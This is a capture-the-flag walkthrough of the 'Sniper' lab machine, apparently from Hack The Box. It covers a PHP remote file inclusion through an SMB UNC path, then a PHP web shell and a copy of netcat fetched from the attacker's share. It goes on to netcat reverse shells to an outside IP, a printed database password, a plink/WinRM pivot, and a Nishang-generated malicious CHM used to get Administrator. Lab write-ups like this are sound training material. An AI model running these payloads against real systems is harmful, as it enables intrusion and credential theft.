Sniper is another box I got access to through an unintended method. The PHP application wasnโt supposed to be exploitable through Remote File Inclusion but because it runs on Windows, we can use UNC path to include a file from an SMB share. Once I had a shell, I pivoted using plink and logged in as user Chris with WinRM. The box author was nice enough to leave hints as to what kind of malicious payload was expected and I used Nishang to generate a CHM payload and get Administrator access.
Summary
- Exploit an RFI in the language parameter to include a PHP file through SMB and gain RCE
- Retrieve the MySQL credentials from the database
- Upgrade the shell to a meterpreter shell and port forward WinRM
- Login as user Chris with the forwarded WinRM socket
- Identify through hints that the admin is waiting for a .chm file
- Craft a malicious .chm file and get a reverse shell as Administrator
Portscan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@kali:~/htb/sniper# nmap -sC -sV -T4 -p- 10.10.10.151
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 09:01 EDT
Nmap scan report for sniper.htb (10.10.10.151)
Host is up (0.049s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m13s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-10-06T20:04:16
|_  start_date: N/A
SMB
No access to shares on SMB
1
2
3
4
5
6
7
8
9
10
root@kali:~/htb/sniper# smbmap -u invalid -H 10.10.10.151
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[!] Authentication error on 10.10.10.151
root@kali:~/htb/sniper# smbmap -u '' -H 10.10.10.151
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Authentication error on 10.10.10.151
Web
The website is pretty generic and most of the links donโt work.

At the bottom of the main page there is a link to the User Portal.

The user portal has a login page and there is a link at the bottom to register a new user.

The registration page looks like this.

After creating myself an account, I log in and see that itโs still under construction.

Next, I scanned the site with rustbuster and found a blog link I didnโt see earlier.



The blog is pretty generic but there is an interesting link to change the language of the page.

As shown in the source code, it is possibly a target for an LFI or RFI since it references a PHP file.

Gaining RCE through RFI in the language parameter
To test for local file inclusion Iโll try including a Windows file I know exists on the target machine. Luckily for me the lang parameter uses the filename with the extension so I can potentially include any file, not just file with php extensions. I am able to get the content of win.ini with the following:
GET /blog/?lang=/windows/win.ini

Next I try to include a remote file through HTTP with GET /blog/?lang=http://10.10.14.11/test.php but I didnโt get a callback so I assume remote file includes are disabled or there is some filtering done on the parameter.
Even though remote file includes are disabled, using a UNC path works since itโs considered a local path by PHP and Iโm able to get a callback through SMB on port 445 with GET /blog/?lang=//10.10.14.11/test/test.php

I canโt get impacket-smbserver working right with this box so instead Iโll use the standard Samba server in Linux and create an open share: net usershare add test /root/htb/sniper/share '' 'Everyone:F' guest_ok=y
Before trying to get RCE, Iโll create an info.php file that calls phpinfo() so I can check for any disabled functions:
1
2
3
<?php
phpinfo();
?>
After calling phpinfo() with GET /blog/?lang=//10.10.14.11/test/info.php I see that itโs running Windows build 17763 and that no functions are disabled.


Next Iโll create another PHP file to execute commands passed in the cmd parameter:
1
2
3
<?php
system($_GET["cmd"]);
?>
And with the following request I can execute commands: GET /blog/?lang=//10.10.14.11/test/nc.php&cmd=whoami

To get a shell Iโll upload netcat to the server with GET /blog/?lang=//10.10.14.11/test/nc.php&cmd=copy+\\10.10.14.11\test\nc.exe+c:\programdata\nc.exe

Then I execute netcat to get a shell with GET /blog/?lang=//10.10.14.11/test/nc.php&cmd=c:\programdata\nc.exe+-e+cmd.exe+10.10.14.11+80

Enumeration of the machine
The first thing I check is the C:\inetpub\wwwroot\user\db.php file used by the login portal so I can see which credentials are used to connect to the database:
1
2
3
4
5
6
7
8
9
10
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>
Then I check out which local users are present on the box:
1
2
3
4
5
6
7
C:\>net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator            Chris                    DefaultAccount
Guest                    WDAGUtilityAccount
The next logical step is to get access to user Chris:
1
2
3
4
...
Local Group Memberships      *Remote Management Users
Global Group memberships     *None
...
Chris is part of the Remote Management Users group and WinRM is listening on port 5985 but firewalled off from the outside.
1
2
3
4
5
6
7
8
9
10
11
12
13
C:\>netstat -an
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:33060          0.0.0.0:0              LISTENING
[...]
...
Shell as user Chris with WinRM
To connect to WinRM Iโll upload plink.exe and create a reverse tunnel for port 5985.

After pivoting, I am able to log in as user Chris.

I find that WinRM is a tad slow so Iโll spawn another netcat as user Chris to continue my enumeration.
More enumeration
The c:\docs directory was previously unaccessible with the previous user but I can see the files now with user Chris.
1
2
3
4
5
6
7
8
9
10
11
12
C:\docs>dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640
 Directory of C:\docs
10/01/2019  01:04 PM    <DIR>          .
10/01/2019  01:04 PM    <DIR>          ..
04/11/2019  09:31 AM               285 note.txt
04/11/2019  09:17 AM           552,607 php for dummies-trial.pdf
               2 File(s)        552,892 bytes
               2 Dir(s)  17,885,601,792 bytes free
The .pdf doesnโt have anything interesting but note.txt contains a hint:
1
2
3
4
5
6
type note.txt
Hi Chris,
	Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
Ok, so the CEO (probably the administrator) is expecting some documentation files to be dropped in this folder. Thereโs probably a script bot running and opening files in this folder. I donโt know what kind of payload heโs expecting so Iโll keep on looking around the box.
The C:\Users\Chris\Downloads directory contains a CHM file.
1
2
3
4
5
6
7
8
9
10
11
C:\Users\Chris\Downloads>dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640
 Directory of C:\Users\Chris\Downloads
04/11/2019  08:36 AM    <DIR>          .
04/11/2019  08:36 AM    <DIR>          ..
04/11/2019  08:36 AM            10,462 instructions.chm
               1 File(s)         10,462 bytes
               2 Dir(s)  17,885,601,792 bytes free
As per Wikipedia:
Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation.
So now things are starting to click:
- The admin/CEO is expecting documentation
- The instruction.chm file is a compiled html file used for documentation
I remembered reading about malicious CHM files some time ago so I make sure to open the file in an isolated Windows VM:

I did some research and found the Nishang Out-CHM tool that can generate malicious payload. I should be able to get RCE as the administrator with this malicious file.
Generating a malicious CHM file for privilege escalation
After installing the HTML Help Workshop on my Windows machine, I generated a malicious CHM file that uses netcat to spawn a reverse shell:
PS > Out-CHM -Payload "C:\programdata\nc.exe -e cmd.exe 10.10.14.11 3333" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Uploaded it to the serverโฆ
*Evil-WinRM* PS C:\docs> copy \\10.10.14.11\test\doc.chm .
And boom, got a shell as administrator:

 
        
      